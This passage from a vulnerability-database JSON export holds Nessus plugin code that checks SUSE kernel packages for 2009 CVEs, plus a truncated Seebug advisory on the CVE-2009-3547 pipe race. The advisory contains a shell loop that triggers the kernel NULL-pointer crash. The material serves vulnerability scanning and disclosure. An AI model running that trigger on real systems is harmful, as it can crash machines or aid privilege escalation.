reference:\"kernel-ovs-2.6.18-128.2.1.4.12.el5\")) flag++;\nif (rpm_check(release:\"OVS2.2\", reference:\"kernel-ovs-devel-2.6.18-128.2.1.4.12.el5\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-devel / kernel-ovs / kernel-ovs-devel\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:12:46", "bulletinFamily": "scanner", "description": "The openSUSE 11.1 Kernel was updated to 2.6.27.39 fixing various bugs and security issues.\n\nFollowing security issues have been fixed: CVE-2009-3547: A race condition during pipe open could be used by local attackers to cause a denial of service. (Due to mmap_min_addr protection enabled by default, code execution is not possible.)\n\nCVE-2009-2910: On x86_64 systems a information leak of high register contents (upper 32bit) was fixed.\n\nCVE-2009-2903: Memory leak in the appletalk subsystem in the Linux kernel when the appletalk and ipddp modules are loaded but the ipddp'N' device is not found, allows remote attackers to cause a denial of service (memory consumption) via IP-DDP datagrams.\n\nCVE-2009-3621: net/unix/af_unix.c in the Linux kernel allows local users to cause a denial of service (system hang) by creating an abstract-namespace AF_UNIX listening socket, performing a shutdown operation on this socket, and then performing a series of connect operations to this socket.\n\nCVE-2009-3612 / CVE-2005-4881: The tcf_fill_node function in net/sched/cls_api.c in the netlink subsystem in the Linux kernel 2.6.x before 2.6.32-rc5, and 2.4.37.6 and earlier, does not initialize a certain tcm__pad2 structure member, which might allow local users to obtain sensitive information from kernel memory via unspecified vectors. NOTE: this issue existed because of an incomplete fix for CVE-2005-4881.\n\nCVE-2009-3620: The ATI Rage 128 (aka r128) driver in the Linux kernel does not properly verify Concurrent Command Engine (CCE) state initialization, which allows local users to cause a denial of service (NULL pointer dereference and system crash) or possibly gain privileges via unspecified ioctl calls.\n\nCVE-2009-3726: The nfs4_proc_lock function in fs/nfs/nfs4proc.c in the NFSv4 client in the Linux kernel allows remote NFS servers to cause a denial of service (NULL pointer dereference and panic) by sending a certain response containing incorrect file attributes, which trigger attempted use of an open file that lacks NFSv4 state.\n\nCVE-2009-3286: Sv4 in the Linux kernel does not properly clean up an inode when an O_EXCL create fails, which causes files to be created with insecure settings such as setuid bits, and possibly allows local users to gain privileges, related to the execution of the do_open_permission function even when a create fails.", "modified": "2016-12-21T00:00:00", "id": "SUSE_11_1_KERNEL-091123.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=42952", "published": "2009-12-01T00:00:00", "title": "openSUSE Security Update : kernel (kernel-1593)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update kernel-1593.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(42952);\n script_version(\"$Revision: 1.15 $\");\n script_cvs_date(\"$Date: 2016/12/21 20:09:51 $\");\n\n script_cve_id(\"CVE-2005-4881\", \"CVE-2009-2903\", \"CVE-2009-2910\", \"CVE-2009-3286\", \"CVE-2009-3547\", \"CVE-2009-3612\", \"CVE-2009-3620\", \"CVE-2009-3621\", \"CVE-2009-3726\");\n\n script_name(english:\"openSUSE Security Update : kernel (kernel-1593)\");\n script_summary(english:\"Check for the kernel-1593 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The openSUSE 11.1 Kernel was updated to 2.6.27.39 fixing various bugs\nand security issues.\n\nFollowing security issues have been fixed: CVE-2009-3547: A race\ncondition during pipe open could be used by local attackers to cause a\ndenial of service. (Due to mmap_min_addr protection enabled by\ndefault, code execution is not possible.)\n\nCVE-2009-2910: On x86_64 systems a information leak of high register\ncontents (upper 32bit) was fixed.\n\nCVE-2009-2903: Memory leak in the appletalk subsystem in the Linux\nkernel when the appletalk and ipddp modules are loaded but the\nipddp'N' device is not found, allows remote attackers to cause a\ndenial of service (memory consumption) via IP-DDP datagrams.\n\nCVE-2009-3621: net/unix/af_unix.c in the Linux kernel allows local\nusers to cause a denial of service (system hang) by creating an\nabstract-namespace AF_UNIX listening socket, performing a shutdown\noperation on this socket, and then performing a series of connect\noperations to this socket.\n\nCVE-2009-3612 / CVE-2005-4881: The tcf_fill_node function in\nnet/sched/cls_api.c in the netlink subsystem in the Linux kernel 2.6.x\nbefore 2.6.32-rc5, and 2.4.37.6 and earlier, does not initialize a\ncertain tcm__pad2 structure member, which might allow local users to\nobtain sensitive information from kernel memory via unspecified\nvectors. NOTE: this issue existed because of an incomplete fix for\nCVE-2005-4881.\n\nCVE-2009-3620: The ATI Rage 128 (aka r128) driver in the Linux kernel\ndoes not properly verify Concurrent Command Engine (CCE) state\ninitialization, which allows local users to cause a denial of service\n(NULL pointer dereference and system crash) or possibly gain\nprivileges via unspecified ioctl calls.\n\nCVE-2009-3726: The nfs4_proc_lock function in fs/nfs/nfs4proc.c in the\nNFSv4 client in the Linux kernel allows remote NFS servers to cause a\ndenial of service (NULL pointer dereference and panic) by sending a\ncertain response containing incorrect file attributes, which trigger\nattempted use of an open file that lacks NFSv4 state.\n\nCVE-2009-3286: Sv4 in the Linux kernel does not properly clean up an\ninode when an O_EXCL create fails, which causes files to be created\nwith insecure settings such as setuid bits, and possibly allows local\nusers to gain privileges, related to the execution of the\ndo_open_permission function even when a create fails.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=441062\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=472410\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=519820\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=522790\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=523487\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=524222\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=524683\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=528427\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=531716\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=536467\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=539010\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=539878\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=540349\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=540997\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=541648\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=542505\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=544760\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=544779\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=547137\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=547357\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=548070\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=548071\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=548074\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=548101\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=548807\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=549567\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=549748\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=549751\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=550648\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=551142\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=551348\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=551942\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=552602\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=552775\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=554122\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=556532\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=556864\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(20, 200, 264, 362, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-trace\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-trace-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-trace-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/11/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/12/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2016 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.1\", reference:\"kernel-debug-2.6.27.39-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"kernel-debug-base-2.6.27.39-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"kernel-debug-extra-2.6.27.39-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"kernel-default-2.6.27.39-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"kernel-default-base-2.6.27.39-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"kernel-default-extra-2.6.27.39-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"kernel-pae-2.6.27.39-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"kernel-pae-base-2.6.27.39-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"kernel-pae-extra-2.6.27.39-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"kernel-source-2.6.27.39-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"kernel-syms-2.6.27.39-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"kernel-trace-2.6.27.39-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"kernel-trace-base-2.6.27.39-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"kernel-trace-extra-2.6.27.39-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"kernel-vanilla-2.6.27.39-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"kernel-xen-2.6.27.39-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"kernel-xen-base-2.6.27.39-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"kernel-xen-extra-2.6.27.39-0.2.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel-debug / kernel-debug-base / kernel-debug-extra / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:12:42", "bulletinFamily": "scanner", "description": "This update fixes various security issues and some bugs in the SUSE Linux Enterprise 9 kernel.\n\nThe following security bugs were fixed :\n\n - A race condition in the pipe(2) systemcall could be used by local attackers to execute code. (CVE-2009-3547)\n\n - On x86_64 systems a information leak of high register contents (upper 32bit) was fixed. (CVE-2009-2910)\n\n - The (1) agp_generic_alloc_page and (2) agp_generic_alloc_pages functions in drivers/char/agp/generic.c in the agp subsystem in the Linux kernel do not zero out pages that may later be available to a user-space process, which allows local users to obtain sensitive information by reading these pages. (CVE-2009-1192)\n\n - Unsigned check in the ax25 socket handler could allow local attackers to potentially crash the kernel or even execute code. (CVE-2009-2909)\n\n - The execve function in the Linux kernel did not properly clear the current->clear_child_tid pointer, which allows local users to cause a denial of service (memory corruption) or possibly gain privileges via a clone system call with CLONE_CHILD_SETTID or CLONE_CHILD_CLEARTID enabled, which is not properly handled during thread creation and exit. (CVE-2009-2848)\n\n - Fixed various sockethandler getname leaks, which could disclose memory previously used by the kernel or other userland processes to the local attacker.\n (CVE-2009-3002)\n\n - Multiple buffer overflows in the cifs subsystem in the Linux kernel allow remote CIFS servers to cause a denial of service (memory corruption) and possibly have unspecified other impact via (1) a malformed Unicode string, related to Unicode string area alignment in fs/cifs/sess.c; or (2) long Unicode characters, related to fs/cifs/cifssmb.c and the cifs_readdir function in fs/cifs/readdir.c. (CVE-2009-1633)\n\n - The nfs4_proc_lock function in fs/nfs/nfs4proc.c in the NFSv4 client in the allows remote NFS servers to cause a denial of service (NULL pointer dereference and panic) by sending a certain response containing incorrect file attributes, which trigger attempted use of an open file that lacks NFSv4 state. (CVE-2009-3726)", "modified": "2016-12-21T00:00:00", "id": "SUSE9_12541.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=42812", "published": "2009-11-16T00:00:00", "title": "SuSE9 Security Update : Linux kernel (YOU Patch Number 12541)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(42812);\n script_version(\"$Revision: 1.15 $\");\n script_cvs_date(\"$Date: 2016/12/21 20:33:29 $\");\n\n script_cve_id(\"CVE-2009-1192\", \"CVE-2009-1633\", \"CVE-2009-2848\", \"CVE-2009-2909\", \"CVE-2009-2910\", \"CVE-2009-3002\", \"CVE-2009-3547\", \"CVE-2009-3726\");\n\n script_name(english:\"SuSE9 Security Update : Linux kernel (YOU Patch Number 12541)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 9 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes various security issues and some bugs in the SUSE\nLinux Enterprise 9 kernel.\n\nThe following security bugs were fixed :\n\n - A race condition in the pipe(2) systemcall could be used\n by local attackers to execute code. (CVE-2009-3547)\n\n - On x86_64 systems a information leak of high register\n contents (upper 32bit) was fixed. (CVE-2009-2910)\n\n - The (1) agp_generic_alloc_page and (2)\n agp_generic_alloc_pages functions in\n drivers/char/agp/generic.c in the agp subsystem in the\n Linux kernel do not zero out pages that may later be\n available to a user-space process, which allows local\n users to obtain sensitive information by reading these\n pages. (CVE-2009-1192)\n\n - Unsigned check in the ax25 socket handler could allow\n local attackers to potentially crash the kernel or even\n execute code. (CVE-2009-2909)\n\n - The execve function in the Linux kernel did not properly\n clear the current->clear_child_tid pointer, which allows\n local users to cause a denial of service (memory\n corruption) or possibly gain privileges via a clone\n system call with CLONE_CHILD_SETTID or\n CLONE_CHILD_CLEARTID enabled, which is not properly\n handled during thread creation and exit. (CVE-2009-2848)\n\n - Fixed various sockethandler getname leaks, which could\n disclose memory previously used by the kernel or other\n userland processes to the local attacker.\n (CVE-2009-3002)\n\n - Multiple buffer overflows in the cifs subsystem in the\n Linux kernel allow remote CIFS servers to cause a denial\n of service (memory corruption) and possibly have\n unspecified other impact via (1) a malformed Unicode\n string, related to Unicode string area alignment in\n fs/cifs/sess.c; or (2) long Unicode characters, related\n to fs/cifs/cifssmb.c and the cifs_readdir function in\n fs/cifs/readdir.c. (CVE-2009-1633)\n\n - The nfs4_proc_lock function in fs/nfs/nfs4proc.c in the\n NFSv4 client in the allows remote NFS servers to cause a\n denial of service (NULL pointer dereference and panic)\n by sending a certain response containing incorrect file\n attributes, which trigger attempted use of an open file\n that lacks NFSv4 state. (CVE-2009-3726)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-1192.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-1633.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-2848.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-2909.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-2910.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3002.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3547.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3726.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply YOU patch number 12541.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(119, 189, 200, 362, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/11/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/11/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2016 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 9 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SUSE9\", cpu:\"i586\", reference:\"kernel-bigsmp-2.6.5-7.321\")) flag++;\nif (rpm_check(release:\"SUSE9\", cpu:\"i586\", reference:\"kernel-debug-2.6.5-7.321\")) flag++;\nif (rpm_check(release:\"SUSE9\", cpu:\"i586\", reference:\"kernel-default-2.6.5-7.321\")) flag++;\nif (rpm_check(release:\"SUSE9\", cpu:\"i586\", reference:\"kernel-smp-2.6.5-7.321\")) flag++;\nif (rpm_check(release:\"SUSE9\", cpu:\"i586\", reference:\"kernel-source-2.6.5-7.321\")) flag++;\nif (rpm_check(release:\"SUSE9\", cpu:\"i586\", reference:\"kernel-syms-2.6.5-7.321\")) flag++;\nif (rpm_check(release:\"SUSE9\", cpu:\"i586\", reference:\"kernel-um-2.6.5-7.321\")) flag++;\nif (rpm_check(release:\"SUSE9\", cpu:\"i586\", reference:\"kernel-xen-2.6.5-7.321\")) flag++;\nif (rpm_check(release:\"SUSE9\", cpu:\"i586\", reference:\"kernel-xenpae-2.6.5-7.321\")) flag++;\nif (rpm_check(release:\"SUSE9\", cpu:\"i586\", reference:\"um-host-install-initrd-1.0-48.34\")) flag++;\nif (rpm_check(release:\"SUSE9\", cpu:\"i586\", reference:\"um-host-kernel-2.6.5-7.321\")) flag++;\nif (rpm_check(release:\"SUSE9\", cpu:\"i586\", reference:\"xen-kmp-3.0.4_2.6.5_7.321-0.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T18:31:27", "bulletinFamily": "exploit", "description": "Bugraq ID: 36901\r\nCVE ID\uff1aCVE-2009-3547\r\n\r\nLinux\u662f\u4e00\u6b3e\u5f00\u653e\u6e90\u4ee3\u7801\u7684\u64cd\u4f5c\u7cfb\u7edf\u3002\r\nLinux Kernel 'pipe.c'\u5b58\u5728\u4e00\u4e2aNull\u6307\u9488\u5f15\u7528\u95ee\u9898\uff0c\u672c\u5730\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u6f0f\u6d1e\u63d0\u5347\u7279\u6743\u3002\r\npipe_rdwr_open()\u4f1a\u89e6\u53d1Null\u6307\u9488\u5f02\u5e38\u751f\u6210\u5982\u4e0b\u5806\u6808\u8ddf\u8e2a\uff1a\r\n&gt; Unable to handle kernel NULL pointer dereference at 0000000000000028 RIP:\r\n&gt; [&lt;ffffffff802899a5&gt;] pipe_rdwr_open+0x35/0x70\r\n&gt; [&lt;ffffffff8028125c&gt;] __dentry_open+0x13c/0x230\r\n&gt; [&lt;ffffffff8028143d&gt;] do_filp_open+0x2d/0x40\r\n&gt; [&lt;ffffffff802814aa&gt;] do_sys_open+0x5a/0x100\r\n&gt; [&lt;ffffffff8021faf3&gt;] sysenter_do_call+0x1b/0x67\r\n\u901a\u8fc7/proc/pid/fd/*\u6253\u5f00\u533f\u540d\u7ba1\u9053\u53ef\u89e6\u53d1\u6b64\u5931\u8d25\u6a21\u5f0f\uff0c\u53ef\u901a\u8fc7\u5982\u4e0b\u811a\u672c\u4f8b\u8bc1\uff1a\r\n=============================================================\r\nwhile : ; do\r\n { echo y ; sleep 1 ; } | { while read ; do echo z$REPLY; done ; } &amp;\r\n PID=$!\r\n OUT=$(ps -efl | grep 'sleep 1' | grep -v grep |\r\n { read PID REST ; echo $PID; } )\r\n OUT=&quot;${OUT%% *}&quot;\r\n DELAY=$((RANDOM * 1000 / 32768))\r\n usleep $((DELAY * 1000 + RANDOM % 1000 ))\r\n echo n &gt; /proc/$OUT/fd/1 # Trigger defect\r\ndone\r\n=============================================================\r\n\u6ce8\u610f\u8fd9\u4e2a\u5931\u8d25\u7a97\u53e3\u5f88\u5c0f\uff0c\u8981\u7a33\u5b9a\u91cd\u65b0\u8fd9\u4e2a\u7f3a\u9677\u9700\u8981\u5728pipe_rdwr_open()\u4e2d\u63d2\u5165\u5c11\u91cf\u5ef6\u8fdf:\r\n static int\r\n pipe_rdwr_open(struct inode *inode, struct file *filp)\r\n {\r\n msleep(100);\r\n mutex_lock(&amp;inode-&gt;i_mutex)\r\n \r\n\u867d\u7136\u8fd9\u4e2a\u7f3a\u9677\u53d1\u73b0\u4e8epipe_rdwr_open()\u51fd\u6570\u4e2d\uff0c\u4f46\u5176\u4ed6pipe_*_open()\u51fd\u6570\u4e5f\u5e94\u8be5\u5b58\u5728\u6b64\u6f0f\u6d1e\u3002\r\n\u8865\u4e01\u4f1a\u5bf9\u5c1d\u8bd5\u64cd\u4f5cinode-&gt;i_pipe\u4e4b\u524d\uff0c\u5bf9inode-&gt;i_pipe\u662f\u5426\u91ca\u653e\u8fdb\u884c\u68c0\u67e5\uff0c\u5982\u679cinode-&gt;i_pipe\u4e0d\u5b58\u5728\u4e86\uff0c\u5c06\u8fd4\u56deENOENT\u8fdb\u884c\u63d0\u793a\u3002\n\nRedHat Enterprise MRG v1 for Red Hat Enterprise Linux version 5\r\nRedHat Enterprise Linux WS 4\r\nRedHat Enterprise Linux WS 3\r\nRedHat Enterprise Linux ES 4\r\nRedHat Enterprise Linux ES 3\r\nRedHat Enterprise Linux Desktop 5 client\r\nRedHat Enterprise Linux AS 4\r\nRedHat Enterprise Linux AS 3\r\nRedHat Enterprise Linux Desktop version 4\r\nRedHat Enterprise Linux 5 server\r\nRedHat Desktop 3.0 \r\nLinux kernel 2.6.31 5\r\nLinux kernel 2.6.31 .2\r\nLinux kernel 2.6.31 